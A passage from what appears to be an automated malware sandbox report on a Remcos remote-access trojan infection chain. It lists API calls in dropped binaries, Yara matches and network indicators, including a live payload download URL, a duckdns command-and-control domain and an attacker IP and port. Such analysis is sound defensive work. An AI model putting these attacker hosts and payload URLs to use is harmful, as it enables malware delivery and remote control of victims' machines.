0000000A.00000003.1481965290.00000000219B1000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1495264734.0000000002286000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ping.pdb source: esentutl.exe, 00000011.00000003.1483371503.0000000005120000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.17.dr
              Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000007.00000000.1403779482.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1413735928.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1416809661.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1421176999.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
              Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6A0E82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF6A0E82978
              Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6A0E8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF6A0E8823C
              Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6A0E735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF6A0E735B8
              Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6A0E71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF6A0E71560
              Source: C:\Users\Public\alpha.exe | Code function: 4_2_00007FF6A0E97B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF6A0E97B4C
              Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6A0E82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,6_2_00007FF6A0E82978
              Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6A0E8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,6_2_00007FF6A0E8823C
              Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6A0E735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,6_2_00007FF6A0E735B8
              Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6A0E71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,6_2_00007FF6A0E71560
              Source: C:\Users\Public\alpha.exe | Code function: 6_2_00007FF6A0E97B4C FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF6A0E97B4C
              Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68FCE3100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF68FCE3100
              Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68FCE10C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF68FCE10C4
              Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68FCE6F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,7_2_00007FF68FCE6F80
              Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68FC7C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,7_2_00007FF68FC7C6F8
              Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68FCE234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,7_2_00007FF68FCE234C
              Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68FC85E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,7_2_00007FF68FC85E58
              Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68FC8DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,7_2_00007FF68FC8DBC0
              Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68FCE1B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,7_2_00007FF68FCE1B04
              Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68FCE19F8 #359,FindFirstFileW,FindNextFileW,FindClose,7_2_00007FF68FCE19F8
              Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68FCC3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,7_2_00007FF68FCC3674
              Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68FC8D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,7_2_00007FF68FC8D4A4
              Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68FC4D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68FC4D440
              Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68FC8B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF68FC8B3D8
              Source: C:\Users\Public\Libraries\AnyDesk.PIF | Code function: 10_2_02D35908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,10_2_02D35908

              Networking

              Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49709 -> 77.221.149.38:47666
              Source: Malware configuration extractor | URLs: http://ferreiragascuritiba.com.br/v/233_Faogvkghvqn
              Source: Malware configuration extractor | URLs: iamblessed.duckdns.org
              Source: Malware configuration extractor | IPs: 127.0.0.1
              Source: unknown | DNS query: name: iamblessed.duckdns.org
              Source: C:\Users\Public\Libraries\AnyDesk.PIF | Code function: 10_2_02D4E4B8 InternetCheckConnectionA,10_2_02D4E4B8
              Source: global traffic | TCP traffic: 192.168.2.8:49709 -> 77.221.149.38:47666
              Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
              Source: Joe Sandbox View | IP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox View | ASN Name: INFOBOX-ASInfoboxruAutonomousSystemRU INFOBOX-ASInfoboxruAutonomousSystemRU
              Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
              Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49710 -> 178.237.33.50:80
              Source: global traffic | HTTP traffic detected: GET /v/233_Faogvkghvqn HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: ferreiragascuritiba.com.br
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic | HTTP traffic detected: GET /v/233_Faogvkghvqn HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: ferreiragascuritiba.com.br
              Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
              Source: global traffic | DNS traffic detected: DNS query: ferreiragascuritiba.com.br
              Source: global traffic | DNS traffic detected: DNS query: iamblessed.duckdns.org
              Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: kn.exe | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: kn.exe, 00000007.00000000.1403779482.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1413735928.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1416809661.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1421176999.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
              Source: AnyDesk.PIF, 0000000A.00000002.1517170522.0000000020B1D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ferreiragascuritiba.com.b
              Source: AnyDesk.PIF, 0000000A.00000002.1493586816.0000000000865000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ferreiragascuritiba.com.br/
              Source: AnyDesk.PIF, 0000000A.00000002.1517170522.0000000020B08000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1493586816.000000000088D000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1493586816.000000000080E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ferreiragascuritiba.com.br/v/233_Faogvkghvqn
              Source: AnyDesk.PIF, 0000000A.00000002.1493586816.000000000080E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ferreiragascuritiba.com.br/v/233_Faogvkghvqnath
              Source: AnyDesk.PIF, 0000000A.00000002.1493586816.000000000088D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ferreiragascuritiba.com.br:80/v/233_FaogvkghvqnP
              Source: SndVol.exe, 00000014.00000003.1535801300.000000001C176000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000003.1537139558.000000001C187000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/
              Source: SndVol.exe, 00000014.00000003.1535801300.000000001C158000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000003.1535801300.000000001C176000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
              Source: SndVol.exe, 00000014.00000002.3879565990.000000001C158000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000003.1535801300.000000001C158000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp.(K
              Source: AnyDesk.PIF, 0000000A.00000002.1519993639.000000007E810000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1498580149.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
              Source: SndVol.exe, 00000014.00000002.3879565990.000000001C118000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpSystem32
              Source: SndVol.exe, 00000014.00000002.3879565990.000000001C158000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000003.1535801300.000000001C158000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpfH5
              Source: SndVol.exe, 00000014.00000002.3879565990.000000001C158000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000003.1535801300.000000001C158000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpl:H
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0C
              Source: AnyDesk.PIF, AnyDesk.PIF, 0000000A.00000002.1497237334.0000000002B93000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1427109635.0000000002B97000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1427511863.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1498326441.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1523550345.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, Faogvkgh.PIF, 00000016.00000002.1647310662.0000000002DA2000.00000004.00001000.00020000.00000000.sdmp, Faogvkgh.PIF, 00000018.00000002.1717002790.0000000002E42000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.pmail.com
              Source: kn.exe | String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
              Source: kn.exe, 00000007.00000000.1403779482.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1413735928.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1416809661.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1421176999.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr | String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
              Source: kn.exe | String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
              Source: kn.exe | String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
              Source: kn.exe | String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
              Source: kn.exe | String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
              Source: kn.exe, 00000007.00000000.1403779482.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1413735928.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1416809661.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1421176999.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr | String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
              Source: kn.exe | String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://sectigo.com/CPS0
              Source: Yara match | File source: 10.2.AnyDesk.PIF.2d30000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: Process Memory Space: AnyDesk.PIF PID: 7748, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 8072, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 5612, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 7296, type: MEMORYSTR

              E-Banking Fraud

              Source: Yara matchFile source: 20.2.SndVol.exe.2cf0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.SndVol.exe.27d0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.SndVol.exe.2cf0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.SndVol.exe.2c00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.SndVol.exe.27d0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.SndVol.exe.2c00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.AnyDesk.PIF.2d30000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000019.00000002.1714791876.0000000000647000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.3879565990.000000001C118000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1519993639.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.1661654615.000000002AB37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1498580149.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: AnyDesk.PIF PID: 7748, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 8072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 5612, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 7296, type: MEMORYSTR
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF68FCB60BC: CertCreateCertificateContext,GetLastError,#357,CertAddCertificateContextToStore,GetLastError,#357,CertCompareCertificateName,CertOpenStore,GetLastError,CertAddCertificateContextToStore,GetLastError,CertFreeCertificateContext,CertCloseStore
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF68FC90F58: CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF68FCA0EF4: NCryptImportKey,#205,#359,#359,#357
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF68FCD6EA8: NCryptImportKey,#360
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF68FC8EA7C: #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF68FC629A0: #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF68FCDA740: CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF68FC625E8: #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF68FC9E1F8: CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF68FC3FC20: #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF68FC2F9B8: strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF68FCD98B0: #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF68FC9184C: CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF68FCA342C: CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError
